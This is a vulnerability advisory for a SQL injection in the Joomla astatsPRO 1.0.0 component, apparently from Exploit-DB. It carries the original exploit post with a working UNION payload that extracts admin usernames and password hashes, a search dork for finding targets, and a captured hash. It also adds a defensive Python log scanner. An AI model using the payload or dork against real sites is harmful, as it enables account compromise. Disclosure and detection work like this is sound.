Vendor: astatsPRO
By: ka0x
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote SQL Injection
CWE: 89
Product Name: astatsPRO
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:astatspro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component astatsPRO Remote SQL Injection Vulnerability

A vulnerability exists in the Joomla component astatsPRO 1.0.0 that allows an attacker to inject arbitrary SQL via the 'id' parameter of the 'refer.php' script (administrator/components/com_astatspro/refer.php). It can be exploited to disclose the admin username and password hash, as well as other sensitive information from the database.

Mitigation:

Upgrade to the latest version of Joomla Component astatsPRO.
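As an added defender-side example (not part of the advisory or of the astatsPRO component), the Python script below scans constructed Apache access-log lines for requests to refer.php whose 'id' parameter is not a plain integer, normalizing the /**/ comment padding the PoC uses so keyword matching is not fooled. The log lines, IPs and timestamps are constructed; the vulnerable path is taken from the PoC.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not from the advisory). Line 3 carries
# the comment-obfuscated UNION query from the PoC; line 4 a space-separated variant.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2008:10:01:02 +0100] "GET /administrator/components/com_astatspro/refer.php?id=42 HTTP/1.1" 302 210 "-" "Mozilla/5.0"
10.0.0.6 - - [18/Feb/2008:10:01:09 +0100] "GET /index.php?option=com_content&id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [18/Feb/2008:10:02:31 +0100] "GET /administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/* HTTP/1.1" 302 250 "-" "Mozilla/5.0"
10.0.0.8 - - [18/Feb/2008:10:03:00 +0100] "GET /administrator/components/com_astatspro/refer.php?id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 302 200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_PATH = '/components/com_astatspro/refer.php'
SQL_TOKEN = re.compile(r'\b(union|select|concat|from)\b')


def normalize(value):
    """Strip /* ... */ comments (the PoC uses /**/ instead of spaces), collapse
    whitespace and lowercase, so keyword matching sees the query as MySQL does."""
    value = re.sub(r'/\*.*?\*/', ' ', value, flags=re.S)
    return re.sub(r'\s+', ' ', value).strip().lower()


def inspect_line(line):
    """Return a finding dict for a suspicious refer.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['url'])
    if not parts.path.endswith(VULN_PATH):
        return None
    # parse_qs already percent-decodes the value once
    raw_id = parse_qs(parts.query, keep_blank_values=True).get('id', [''])[0]
    norm = normalize(raw_id)
    if re.fullmatch(r'-?\d+', norm):
        return None  # a plain integer is the only legitimate shape for 'id'
    return {
        'ip': m['ip'], 'time': m['ts'], 'status': m['status'],
        'id': raw_id, 'sql_tokens': sorted(set(SQL_TOKEN.findall(norm))),
    }


def scan(log_text):
    """Run inspect_line over every line and keep the findings."""
    return [hit for hit in map(inspect_line, log_text.splitlines()) if hit]
```

The injected query is answered with a 302 whose redirect target carries the selected columns (as the advisory's captured page shows), so the status code alone is not a useful signal; the shape of the 'id' parameter is.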

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Joomla Component astatsPRO Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

## bug found by ka0x
## D.O.M TEAM 2008
## we are: ka0x, an0de, xarnuz
## http://www.domlabs.org/
## contact: ka0x01[at]gmail.com
## from spain

d0rk: allinurl: "com_astatspro"

PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*


Look at the code of the page:

<HTML>
<HEAD>

    <TITLE>302 Moved</TITLE>

</HEAD>
<BODY BGCOLOR=#FFFFFF>

    <H1>302 Moved</H1>
    The document has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.


</BODY>
</HTML>

greets: ssh-2, phnx, nettoxic, jns07, her0, JosS, Plexinium Team, FaLENcE, Hendrix,
        Piker, you_kn0w, Celciuz, Lady_Lara, The Shredder, RedHack Team, zickox, Furtivo.
       

__EOF__

    <name>astatsPRO</name>
    <creationDate>16/07/2006</creationDate>
    <author>www.joom.la</author>
    <copyright>Copyright (c) 2006 mobico (Marcel Boettcher)</copyright>
    <authorEmail>info@joom.la</authorEmail>
    <authorUrl>http://astatspro.joom.la/</authorUrl>
    <version>1.0.0</version>
    <description><![CDATA[
      <span>1.0.0 [stable] Component - to count your visitors.</span> <b> Z&auml;hlt ihre Besucher.</b>
      <p><b>astatsPRO is based on:</b> <a target="_blank" href="http://christoph-bachner.net/chcounter/"> chCounter 3.1.1 (13|07|2005)©2005 www.Christoph Bachner.net</a><br /><br /></p>
    ]]>
    </description>

# milw0rm.com [2008-02-18]